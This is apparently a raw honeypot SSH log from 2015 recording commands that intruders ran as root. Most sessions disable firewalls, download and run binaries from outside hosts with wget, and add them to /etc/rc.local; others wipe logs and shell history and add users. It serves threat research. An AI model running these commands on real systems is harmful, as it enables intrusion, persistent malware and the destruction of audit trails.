"/etc/init.d/iptables stop">>/etc/rc.local From 5.15.85.159 28-Aug-2015 03:10:29 ssh2 root w cat /etc/passwd wget uname -a wget rename.altervista.org/muhnoucompilat.jpg tar xzvf "muhnoucompilat.jpg" rm -rf "muhnoucompilat.jpg" cd lib ./inst cd ls history From 121.12.173.62 28-Aug-2015 09:08:57 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://121.12.173.62:81/pz-100;chmod 777 pz-100;./pz-100; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://121.12.173.62:81/pz-100 chmod 777 pz-100 ./pz-100 From 222.186.190.52 29-Aug-2015 13:21:57 ssh2 root Exec /etc/init.d/iptables stop; service iptables stop; SuSEfirewall2 stop; reSuSEfirewall2 stop; cd /tmp; wget -c http://222.186.190.52:8888/v9; chmod 777 v9; ./v9; echo "cd /tmp/">>/etc/rc.local; echo "./v9&">>/etc/rc.local; echo "/etc/init.d/iptables stop">>/etc/rc.local; wget -c http://222.186.190.52:8888/36000; chmod 777 36000; ./36000; echo "cd /tmp/">>/etc/rc.local; echo "./36000&">>/etc/rc.local; echo "/etc/init.d/iptables stop">>/etc/rc.local; wget -c http://222.186.190.52:8888/m5; chmod 777 m5; ./m5; echo "cd /tmp/">>/etc/rc.local; echo "./m5&">>/etc/rc.local; echo "/etc/init.d/iptables stop">>/etc/rc.local; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop cd /tmp wget -c http://222.186.190.52:8888/v9 chmod 777 v9 ./v9 echo "cd /tmp/">>/etc/rc.local echo "./v9&">>/etc/rc.local echo "/etc/init.d/iptables stop">>/etc/rc.local wget -c http://222.186.190.52:8888/36000 chmod 777 36000 ./36000 echo "cd /tmp/">>/etc/rc.local echo "./36000&">>/etc/rc.local echo "/etc/init.d/iptables stop">>/etc/rc.local wget -c http://222.186.190.52:8888/m5 chmod 777 m5 ./m5 echo "cd /tmp/">>/etc/rc.local echo "./m5&">>/etc/rc.local echo "/etc/init.d/iptables stop">>/etc/rc.local From 121.12.173.62 30-Aug-2015 23:14:45 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://115.144.107.188/duge-25;chmod 755 duge-25;./duge-25; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://115.144.107.188/duge-25 chmod 755 duge-25 ./duge-25 From 23.228.203.99 30-Aug-2015 23:33:25 ssh2 root Exec /etc/init.d/iptables stop; service iptables stop; SuSEfirewall2 stop; reSuSEfirewall2 stop; cd ..; cd /tmp; wget -c http://23.228.203.98:55678/su360; chmod 777 su360; ./su360; echo "cd /tmp/">>/etc/rc.local; echo "./su360&">>/etc/rc.local; echo "/etc/init.d/iptables stop">>/etc/rc.local; wget -c http://23.228.203.98:55678/s58596; chmod 777 s58596; ./s58596; echo "cd /tmp/">>/etc/rc.local; echo "./s58596&">>/etc/rc.local; echo "/etc/init.d/iptables stop">>/etc/rc.local; wget -c http://23.228.203.98:55678/u58596; chmod 777 u58596; ./u58596; echo "cd /tmp/">>/etc/rc.local; echo "./u58596&">>/etc/rc.local; echo "/etc/init.d/iptables stop">>/etc/rc.local; wget -c http://23.228.203.98:55678/10991fuck2; chmod 777 10991fuck2; ./10991fuck2; echo "cd /tmp/">>/etc/rc.local; echo "./10991fuck2&">>/etc/rc.local; echo "/etc/init.d/iptables stop">>/etc/rc.local; wget -c http://23.228.203.98:55678/s58595; chmod 777 s58595; ./s58595; echo "cd /tmp/">>/etc/rc.local; echo "./s58595&">>/etc/rc.local; echo "/etc/init.d/iptables stop">>/etc/rc.local; wget -c http://23.228.203.98:55678/u58595; chmod 777 u58595; ./u58595; echo "cd /tmp/">>/etc/rc.local; echo "./u58595&">>/etc/rc.local; echo "/etc/init.d/iptables stop">>/etc/rc.local; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop cd .. cd /tmp wget -c http://23.228.203.98:55678/su360 chmod 777 su360 ./su360 echo "cd /tmp/">>/etc/rc.local echo "./su360&">>/etc/rc.local echo "/etc/init.d/iptables stop">>/etc/rc.local wget -c http://23.228.203.98:55678/s58596 chmod 777 s58596 ./s58596 echo "cd /tmp/">>/etc/rc.local echo "./s58596&">>/etc/rc.local echo "/etc/init.d/iptables stop">>/etc/rc.local wget -c http://23.228.203.98:55678/u58596 chmod 777 u58596 ./u58596 echo "cd /tmp/">>/etc/rc.local echo "./u58596&">>/etc/rc.local echo "/etc/init.d/iptables stop">>/etc/rc.local wget -c http://23.228.203.98:55678/10991fuck2 chmod 777 10991fuck2 ./10991fuck2 echo "cd /tmp/">>/etc/rc.local echo "./10991fuck2&">>/etc/rc.local echo "/etc/init.d/iptables stop">>/etc/rc.local wget -c http://23.228.203.98:55678/s58595 chmod 777 s58595 ./s58595 echo "cd /tmp/">>/etc/rc.local echo "./s58595&">>/etc/rc.local echo "/etc/init.d/iptables stop">>/etc/rc.local wget -c http://23.228.203.98:55678/u58595 chmod 777 u58595 ./u58595 echo "cd /tmp/">>/etc/rc.local echo "./u58595&">>/etc/rc.local echo "/etc/init.d/iptables stop">>/etc/rc.local From 23.228.203.99 31-Aug-2015 14:12:37 ssh2 root Exec /etc/init.d/iptables stop; service iptables stop; SuSEfirewall2 stop; reSuSEfirewall2 stop; cd ..; cd /tmp; wget -c http://23.228.203.98:55678/su360; chmod 777 su360; ./su360; echo "cd /tmp/">>/etc/rc.local; echo "./su360&">>/etc/rc.local; echo "/etc/init.d/iptables stop">>/etc/rc.local; wget -c http://23.228.203.98:55678/s58596; chmod 777 s58596; ./s58596; echo "cd /tmp/">>/etc/rc.local; echo "./s58596&">>/etc/rc.local; echo "/etc/init.d/iptables stop">>/etc/rc.local; wget -c http://23.228.203.98:55678/u58596; chmod 777 u58596; ./u58596; echo "cd /tmp/">>/etc/rc.local; echo "./u58596&">>/etc/rc.local; echo "/etc/init.d/iptables stop">>/etc/rc.local; wget -c http://23.228.203.98:55678/v9; chmod 777 v9; ./v9; echo "cd /tmp/">>/etc/rc.local; echo "./v9&">>/etc/rc.local; echo "/etc/init.d/iptables stop">>/etc/rc.local; wget -c http://23.228.203.98:55678/s58597; chmod 777 s58597; ./s58597; echo "cd /tmp/">>/etc/rc.local; echo "./s58597&">>/etc/rc.local; echo "/etc/init.d/iptables stop">>/etc/rc.local; wget -c http://23.228.203.98:55678/u58597; chmod 777 u58597; ./u58597; echo "cd /tmp/">>/etc/rc.local; echo "./u58597&">>/etc/rc.local; echo "/etc/init.d/iptables stop">>/etc/rc.local; wget -c http://23.228.203.98:55678/10991fuck2; chmod 777 10991fuck2; ./10991fuck2; echo "cd /tmp/">>/etc/rc.local; echo "./10991fuck2&">>/etc/rc.local; echo "/etc/init.d/iptables stop">>/etc/rc.local; wget -c http://23.228.203.98:55678/s58595; chmod 777 s58595; ./s58595; echo "cd /tmp/">>/etc/rc.local; echo "./s58595&">>/etc/rc.local; echo "/etc/init.d/iptables stop">>/etc/rc.local; wget -c http://23.228.203.98:55678/u58595; chmod 777 u58595; ./u58595; echo "cd /tmp/">>/etc/rc.local; echo "./u58595&">>/etc/rc.local; echo "/etc/init.d/iptables stop">>/etc/rc.local; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop cd .. cd /tmp wget -c http://23.228.203.98:55678/su360 chmod 777 su360 ./su360 echo "cd /tmp/">>/etc/rc.local echo "./su360&">>/etc/rc.local echo "/etc/init.d/iptables stop">>/etc/rc.local wget -c http://23.228.203.98:55678/s58596 chmod 777 s58596 ./s58596 echo "cd /tmp/">>/etc/rc.local echo "./s58596&">>/etc/rc.local echo "/etc/init.d/iptables stop">>/etc/rc.local wget -c http://23.228.203.98:55678/u58596 chmod 777 u58596 ./u58596 echo "cd /tmp/">>/etc/rc.local echo "./u58596&">>/etc/rc.local echo "/etc/init.d/iptables stop">>/etc/rc.local wget -c http://23.228.203.98:55678/v9 chmod 777 v9 ./v9 echo "cd /tmp/">>/etc/rc.local echo "./v9&">>/etc/rc.local echo "/etc/init.d/iptables stop">>/etc/rc.local wget -c http://23.228.203.98:55678/s58597 chmod 777 s58597 ./s58597 echo "cd /tmp/">>/etc/rc.local echo "./s58597&">>/etc/rc.local echo "/etc/init.d/iptables stop">>/etc/rc.local wget -c http://23.228.203.98:55678/u58597 chmod 777 u58597 ./u58597 echo "cd /tmp/">>/etc/rc.local echo "./u58597&">>/etc/rc.local echo "/etc/init.d/iptables stop">>/etc/rc.local wget -c http://23.228.203.98:55678/10991fuck2 chmod 777 10991fuck2 ./10991fuck2 echo "cd /tmp/">>/etc/rc.local echo "./10991fuck2&">>/etc/rc.local echo "/etc/init.d/iptables stop">>/etc/rc.local wget -c http://23.228.203.98:55678/s58595 From 222.186.190.52 1-Sep-2015 14:37:57 ssh2 root Exec /etc/init.d/iptables stop; service iptables stop; SuSEfirewall2 stop; reSuSEfirewall2 stop; cd /tmp; wget -c http://222.186.190.52:8888/991; chmod 777 991; ./991; echo "cd /tmp/">>/etc/rc.local; echo "./991&">>/etc/rc.local; echo "/etc/init.d/iptables stop">>/etc/rc.local; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop cd /tmp wget -c http://222.186.190.52:8888/991 chmod 777 991 ./991 echo "cd /tmp/">>/etc/rc.local echo "./991&">>/etc/rc.local echo "/etc/init.d/iptables stop">>/etc/rc.local From 23.228.203.99 2-Sep-2015 00:24:05 ssh2 root Exec /etc/init.d/iptables stop; service iptables stop; SuSEfirewall2 stop; reSuSEfirewall2 stop; cd ..; cd /tmp; rm -f *; wget -c http://23.228.203.98:55678/s58596; chmod 777 s58596; ./s58596; echo "cd /tmp/">>/etc/rc.local; echo "./s58596&">>/etc/rc.local; echo "/etc/init.d/iptables stop">>/etc/rc.local; wget -c http://23.228.203.98:55678/u58596; chmod 777 u58596; ./u58596; echo "cd /tmp/">>/etc/rc.local; echo "./u58596&">>/etc/rc.local; echo "/etc/init.d/iptables stop">>/etc/rc.local; wget -c http://23.228.203.98:55678/s58597; chmod 777 s58597; ./s58597; echo "cd /tmp/">>/etc/rc.local; echo "./s58597&">>/etc/rc.local; echo "/etc/init.d/iptables stop">>/etc/rc.local; wget -c http://23.228.203.98:55678/u58597; chmod 777 u58597; ./u58597; echo "cd /tmp/">>/etc/rc.local; echo "./u58597&">>/etc/rc.local; echo "/etc/init.d/iptables stop">>/etc/rc.local; wget -c http://23.228.203.98:55678/10991fuck2; chmod 777 10991fuck2; ./10991fuck2; echo "cd /tmp/">>/etc/rc.local; echo "./10991fuck2&">>/etc/rc.local; echo "/etc/init.d/iptables stop">>/etc/rc.local; wget -c http://23.228.203.98:55678/v9; chmod 777 v9; ./v9; echo "cd /tmp/">>/etc/rc.local; echo "./v9&">>/etc/rc.local; echo "/etc/init.d/iptables stop">>/etc/rc.local; wget -c http://23.228.203.98:55678/su360; chmod 777 su360; ./su360; echo "cd /tmp/">>/etc/rc.local; echo "./su360&">>/etc/rc.local; echo "/etc/init.d/iptables stop">>/etc/rc.local; wget -c http://23.228.203.98:55678/s58595; chmod 777 s58595; ./s58595; echo "cd /tmp/">>/etc/rc.local; echo "./s58595&">>/etc/rc.local; echo "/etc/init.d/iptables stop">>/etc/rc.local; wget -c http://23.228.203.98:55678/u58595; chmod 777 u58595; ./u58595; echo "cd /tmp/">>/etc/rc.local; echo "./u58595&">>/etc/rc.local; echo "/etc/init.d/iptables stop">>/etc/rc.local; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop cd .. cd /tmp rm -f * wget -c http://23.228.203.98:55678/s58596 chmod 777 s58596 ./s58596 echo "cd /tmp/">>/etc/rc.local echo "./s58596&">>/etc/rc.local echo "/etc/init.d/iptables stop">>/etc/rc.local wget -c http://23.228.203.98:55678/u58596 chmod 777 u58596 ./u58596 echo "cd /tmp/">>/etc/rc.local echo "./u58596&">>/etc/rc.local echo "/etc/init.d/iptables stop">>/etc/rc.local wget -c http://23.228.203.98:55678/s58597 chmod 777 s58597 ./s58597 echo "cd /tmp/">>/etc/rc.local echo "./s58597&">>/etc/rc.local echo "/etc/init.d/iptables stop">>/etc/rc.local wget -c http://23.228.203.98:55678/u58597 chmod 777 u58597 ./u58597 echo "cd /tmp/">>/etc/rc.local echo "./u58597&">>/etc/rc.local echo "/etc/init.d/iptables stop">>/etc/rc.local wget -c http://23.228.203.98:55678/10991fuck2 chmod 777 10991fuck2 ./10991fuck2 echo "cd /tmp/">>/etc/rc.local echo "./10991fuck2&">>/etc/rc.local echo "/etc/init.d/iptables stop">>/etc/rc.local wget -c http://23.228.203.98:55678/v9 chmod 777 v9 ./v9 echo "cd /tmp/">>/etc/rc.local echo "./v9&">>/etc/rc.local echo "/etc/init.d/iptables stop">>/etc/rc.local wget -c http://23.228.203.98:55678/su360 chmod 777 su360 ./su360 echo "cd /tmp/">>/etc/rc.local echo "./su360&">>/etc/rc.local echo "/etc/init.d/iptables stop">>/etc/rc.local From 222.186.190.52 2-Sep-2015 19:56:21 ssh2 root Exec /etc/init.d/iptables stop; service iptables stop; SuSEfirewall2 stop; reSuSEfirewall2 stop; cd /tmp; wget -c http://222.186.190.52:8888/v9; chmod 777 v9; ./v9; echo "cd /tmp/">>/etc/rc.local; echo "./v9&">>/etc/rc.local; echo "/etc/init.d/iptables stop">>/etc/rc.local; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop cd /tmp wget -c http://222.186.190.52:8888/v9 chmod 777 v9 ./v9 echo "cd /tmp/">>/etc/rc.local echo "./v9&">>/etc/rc.local echo "/etc/init.d/iptables stop">>/etc/rc.local From 121.12.173.62 2-Sep-2015 23:41:31 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c httphttp://121.12.173.62:81/pz-100;chmod 0755 pz-100;./pz-100; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c httphttp://121.12.173.62:81/pz-100 chmod 0755 pz-100 ./pz-100 From 223.221.69.56 4-Sep-2015 06:07:49 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://218.2.0.16:7555/z;chmod 777 z;./z; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://218.2.0.16:7555/z chmod 777 z ./z From 180.97.220.33 4-Sep-2015 15:53:57 ssh2 root Exec /etc/init.d/iptables stop; service iptables stop; SuSEfirewall2 stop; reSuSEfirewall2 stop; cd ..; cd /tmp; rm -f *; wget -c http://23.228.203.98:55678/10991fuck1; chmod 777 10991fuck1; ./10991fuck1; echo "cd /tmp/">>/etc/rc.local; echo "./10991fuck1&">>/etc/rc.local; echo "/etc/init.d/iptables stop">>/etc/rc.local; wget -c http://23.228.203.98:55678/10991fuck2; chmod 777 10991fuck2; ./10991fuck2; echo "cd /tmp/">>/etc/rc.local; echo "./10991fuck2&">>/etc/rc.local; echo "/etc/init.d/iptables stop">>/etc/rc.local; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop cd .. cd /tmp rm -f * wget -c http://23.228.203.98:55678/10991fuck1 chmod 777 10991fuck1 ./10991fuck1 echo "cd /tmp/">>/etc/rc.local echo "./10991fuck1&">>/etc/rc.local echo "/etc/init.d/iptables stop">>/etc/rc.local wget -c http://23.228.203.98:55678/10991fuck2 chmod 777 10991fuck2 ./10991fuck2 echo "cd /tmp/">>/etc/rc.local echo "./10991fuck2&">>/etc/rc.local echo "/etc/init.d/iptables stop">>/etc/rc.local From 222.187.223.230 5-Sep-2015 21:12:21 ssh2 root Exec /etc/init.d/iptables stop; service iptables stop; SuSEfirewall2 stop; reSuSEfirewall2 stop; cd /tmp; wget -c http://222.187.223.230:8080/32; chmod 777 32; ./32; echo "cd /tmp/">>/etc/rc.local; echo "./32&">>/etc/rc.local; echo "/etc/init.d/iptables stop">>/etc/rc.local; wget -c http://222.187.223.230:8080/64; chmod 777 64; ./64; echo "cd /tmp/">>/etc/rc.local; echo "./64&">>/etc/rc.local; echo "/etc/init.d/iptables stop">>/etc/rc.local; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop cd /tmp wget -c http://222.187.223.230:8080/32 chmod 777 32 ./32 echo "cd /tmp/">>/etc/rc.local echo "./32&">>/etc/rc.local echo "/etc/init.d/iptables stop">>/etc/rc.local wget -c http://222.187.223.230:8080/64 chmod 777 64 ./64 echo "cd /tmp/">>/etc/rc.local echo "./64&">>/etc/rc.local echo "/etc/init.d/iptables stop">>/etc/rc.local From 180.97.220.33 6-Sep-2015 11:51:33 ssh2 root Exec /etc/init.d/iptables stop; service iptables stop; SuSEfirewall2 stop; reSuSEfirewall2 stop; cd ..; cd /tmp; wget -c http://23.228.203.98:55678/10991fuck1; chmod 777 10991fuck1; ./10991fuck1; echo "cd /tmp/">>/etc/rc.local; echo "./10991fuck1&">>/etc/rc.local; echo "/etc/init.d/iptables stop">>/etc/rc.local; wget -c http://23.228.203.98:55678/10991fuck2; chmod 777 10991fuck2; ./10991fuck2; echo "cd /tmp/">>/etc/rc.local; echo "./10991fuck2&">>/etc/rc.local; echo "/etc/init.d/iptables stop">>/etc/rc.local; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop cd .. cd /tmp wget -c http://23.228.203.98:55678/10991fuck1 chmod 777 10991fuck1 ./10991fuck1 echo "cd /tmp/">>/etc/rc.local echo "./10991fuck1&">>/etc/rc.local echo "/etc/init.d/iptables stop">>/etc/rc.local wget -c http://23.228.203.98:55678/10991fuck2 chmod 777 10991fuck2 ./10991fuck2 echo "cd /tmp/">>/etc/rc.local echo "./10991fuck2&">>/etc/rc.local echo "/etc/init.d/iptables stop">>/etc/rc.local From 79.117.165.198 7-Sep-2015 17:09:57 ssh2 root w ls clear From 163.172.30.250 7-Sep-2015 22:03:01 ssh2 root clear ls clear passwd clear ls cat /proc/cpuinfo From 5.13.154.240 9-Sep-2015 03:21:25 ssh2 root w ifconfig passwd cd /root passwd yum apt-get apt-get install passwd apt-get install passwd install passwd passwdtop install passwd From 82.79.233.189 9-Sep-2015 18:00:37 ssh2 root uname -a uptime cat /proc/cpuinfo ifconfig cat /etc/passwd cd cd /tmp ls ls Mail cd Mail ls cat * cd passwd From 220.170.89.225 12-Sep-2015 19:16:37 ssh2 root Exec /etc/init.d/iptables stop; service iptables stop; SuSEfirewall2 stop; reSuSEfirewall2 stop; cd /tmp; wget -c http://220.170.89.225:8080/1r; chmod 777 1r; ./1r; echo "cd /tmp/">>/etc/rc.local; echo "./1r&">>/etc/rc.local; echo "/etc/init.d/iptables stop">>/etc/rc.local; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop cd /tmp wget -c http://220.170.89.225:8080/1r chmod 777 1r ./1r echo "cd /tmp/">>/etc/rc.local echo "./1r&">>/etc/rc.local echo "/etc/init.d/iptables stop">>/etc/rc.local From 121.12.173.62 13-Sep-2015 08:04:43 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://121.12.173.62:81/pz-100;chmod 0755 pz-100;./pz-100; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://121.12.173.62:81/pz-100 chmod 0755 pz-100 ./pz-100 From 121.12.173.62 14-Sep-2015 04:46:39 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://115.144.107.188/duge-25;chmod 777 duge-25;./duge-25; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://115.144.107.188/duge-25 chmod 777 duge-25 ./duge-25 From 176.241.185.20 17-Sep-2015 06:44:05 ssh2 root uname -a sudo su znc --makeconf uname -l ifconf wget adduser add help ls add From 121.12.173.62 17-Sep-2015 15:34:23 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://121.12.173.62:81/pz-100;chmod 0755 pz-100;./pz100; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://121.12.173.62:81/pz-100 chmod 0755 pz-100 ./pz100 From 23.228.203.98 18-Sep-2015 21:48:37 ssh2 root Exec /etc/init.d/iptables stop; service iptables stop; SuSEfirewall2 stop; reSuSEfirewall2 stop; cd ..; cd /tmp; rm -f *; wget -c http://23.228.203.98:55678/10991fuck; chmod 777 10991fuck; ./10991fuck; echo "cd /tmp/">>/etc/rc.local; echo "./10991fuck&">>/etc/rc.local; echo "/etc/init.d/iptables stop">>/etc/rc.local; wget -c http://23.228.203.98:55678/58595u; chmod 777 58595u; ./58595u; echo "cd /tmp/">>/etc/rc.local; echo "./58595u&">>/etc/rc.local; echo "/etc/init.d/iptables stop">>/etc/rc.local; wget -c http://23.228.203.98:55678/58595s; chmod 777 58595s; ./58595s; echo "cd /tmp/">>/etc/rc.local; echo "./58595s&">>/etc/rc.local; echo "/etc/init.d/iptables stop">>/etc/rc.local; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop cd .. cd /tmp rm -f * wget -c http://23.228.203.98:55678/10991fuck chmod 777 10991fuck ./10991fuck echo "cd /tmp/">>/etc/rc.local echo "./10991fuck&">>/etc/rc.local echo "/etc/init.d/iptables stop">>/etc/rc.local wget -c http://23.228.203.98:55678/58595u chmod 777 58595u ./58595u echo "cd /tmp/">>/etc/rc.local echo "./58595u&">>/etc/rc.local echo "/etc/init.d/iptables stop">>/etc/rc.local wget -c http://23.228.203.98:55678/58595s chmod 777 58595s ./58595s echo "cd /tmp/">>/etc/rc.local echo "./58595s&">>/etc/rc.local echo "/etc/init.d/iptables stop">>/etc/rc.local From 79.115.199.233 19-Sep-2015 02:41:41 ssh2 root unset HISTFILE HISTSAVE HISTMOVE HISTZONE HISTORY HISTLOG USERHOST w ls -a From 1.55.239.7 19-Sep-2015 07:34:45 ssh2 root uname -a w cat /etc/issue perl From 1.55.239.7 19-Sep-2015 12:27:49 ssh2 root cat .bash_ pwd From 1.55.239.7 19-Sep-2015 17:20:53 ssh2 root cd /lib ls -a From 1.55.239.7 19-Sep-2015 22:13:57 ssh2 root wget loss.at.ua/autopsy.tgz tar xvf autopsy.tgz rm -rf autopsy.tgz cd .bash chmod +x * ./autorun ./run wget loss.at.ua/autopsy.tgz tar xvf autopsy.tgz rm -rf autopsy.tgz cd .bash chmod +x * ./autorun ./run From 1.55.239.7 20-Sep-2015 03:07:01 ssh2 root ftp loss.at.ua cat /proc/cpuinfo yum install perl apt-get install perl perl From 79.115.199.233 20-Sep-2015 07:19:29 ssh2 root unset HISTFILE HISTSAVE HISTMOVE HISTZONE HISTORY HISTLOG USERHOST ls -a rm -rf .bash_history ls -a rm -rf * ls -a reboot restart exit From 74.208.147.106 20-Sep-2015 08:00:05 ssh2 root w ps -x pwrl perl wget ps -x cat /proc/cpuinfo ifconfig uname -a apt-get install yum cat /etc/issue name -a perl yum install perl wget loss.at.ua/autopsy.tgz wget loss -c get wget -c loss.at.ua/autopsy.tgz tar xvf autopsy.tgz rm -rf autopsy.tgz cd .bash chmod +x * ./autorun ./run apt-get install ftp ap-0t-get update ap-0 apt-get update apt-get upgrade yum apt-get apt-get update cat /etc/passwd ls -a ps -x From 1.55.239.7 20-Sep-2015 12:53:09 ssh2 root ifconfig exit From 79.115.199.233 20-Sep-2015 17:46:13 ssh2 root unset HISTFILE HISTSAVE HISTMOVE HISTZONE HISTORY HISTLOG USERHOST ls -a rm -rf .bash_history ls -a rm -rf * ls -a rebppt reboot restart exit From 121.12.173.62 21-Sep-2015 02:22:07 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://14.29.47.121:85/jiao91;chmod 755 jiao91;./jiao91; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://14.29.47.121:85/jiao91 chmod 755 jiao91 ./jiao91 From 121.12.173.62 21-Sep-2015 12:43:05 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://121.12.173.62:81/ssd;chmod 755 ssd;./ssd; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://121.12.173.62:81/ssd chmod 755 ssd ./ssd From 121.12.173.62 21-Sep-2015 23:04:03 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://121.12.173.62:81/duge-100;chmod 777 duge-100;./duge-100; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://121.12.173.62:81/duge-100 chmod 777 duge-100 ./duge-100 From 46.101.0.61 23-Sep-2015 04:23:01 ssh2 root w wget http://i9x0.com/tools/bnc.jpg uname -a From 46.101.0.61 23-Sep-2015 09:16:05 ssh2 root curl -O http://i9x0.com/tools/bnc.jpg From 187.157.22.131 23-Sep-2015 14:09:09 ssh2 root history From 81.18.92.114 24-Sep-2015 09:41:25 ssh2 root w uname -a cat /proc/cpuinfo exit From 176.241.185.20 28-Sep-2015 11:22:45 ssh2 root uname -l uname -a ls ifconfig passwd From 50.21.183.44 28-Sep-2015 16:15:49 ssh2 root znc --makeconf make apt apt-get apt-get install znc znc --makeconf znc From 176.241.185.20 28-Sep-2015 21:08:53 ssh2 root znc exit From 221.12.62.162 29-Sep-2015 02:01:57 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://221.12.62.162:5382/juntao;chmod 777 juntao;sh juntao; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://221.12.62.162:5382/juntao chmod 777 juntao sh juntao From 221.12.62.162 29-Sep-2015 06:55:01 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c wget -c http://221.12.62.162:5382/juntao;chmod 777 juntao;sh juntao; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c wget -c http://221.12.62.162:5382/juntao chmod 777 juntao sh juntao From 221.12.62.162 29-Sep-2015 11:48:05 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://221.12.62.162:5382/Lxw1;chmod 777 Lxw1;sh Lxw1; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://221.12.62.162:5382/Lxw1 chmod 777 Lxw1 sh Lxw1 From 221.12.62.162 29-Sep-2015 21:34:13 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://221.12.62.162:5382/lxw520;chmod 777 lxw520;sh lxw520; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://221.12.62.162:5382/lxw520 chmod 777 lxw520 sh lxw520 From 112.198.78.39 30-Sep-2015 12:13:25 ssh2 root ps x dir From 176.241.185.20 30-Sep-2015 17:06:29 ssh2 root uname -a exit ps x adduser add -uname From 82.79.251.246 30-Sep-2015 21:59:33 ssh2 root w ifconfig cat /proc/cpuinfo exit From 151.80.154.135 1-Oct-2015 02:52:37 ssh2 root w ifconfig cat /etc/issue cat /etc/redhat-release From 109.236.91.85 1-Oct-2015 07:45:41 ssh2 root cd /var/tmp unset rm -rf /var/run/utmp /var/log/wtmp /var/log/lastlog /var/log/messages /var/log/secure /var/log/xferlog touch /var/run/utmp /var/log/wtmp /var/log/lastlog /var/log/messages /var/log/secure /var/log/xferlog /var/log/maillog unset HISTFILE unset HISTSAVE unset HISTLOG history -n unset WATCH export HISTFILE=/dev/null wget http://djsony.ucoz.com/shadowfire.jpg wget From 221.12.62.162 1-Oct-2015 12:38:45 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://221.12.62.162:7926/lxw520;chmod 777 lxw520;sh lxw520; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://221.12.62.162:7926/lxw520 chmod 777 lxw520 sh lxw520 From 221.12.62.162 1-Oct-2015 17:31:49 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c wget -c http://221.12.62.162:7926/lxwjt;chmod 777 lxwjt;sh lxwjt; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c wget -c http://221.12.62.162:7926/lxwjt chmod 777 lxwjt sh lxwjt From 81.18.69.95 2-Oct-2015 17:57:09 ssh2 root w reboot exit From 85.9.20.151 3-Oct-2015 13:29:25 ssh2 root uname -a w cd /var/tmp ls -a cat /etc/issue cat /etc/passwd uptime uname -a wget ftp useradd postgres adduser postgres sudo id From 85.9.20.151 3-Oct-2015 18:22:29 ssh2 root ls wget superuser.000webhost.com/psy.tgz wget 31.170.160.59/psy.tgz ftp files.000webhost.com From 121.12.173.62 4-Oct-2015 11:12:05 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c 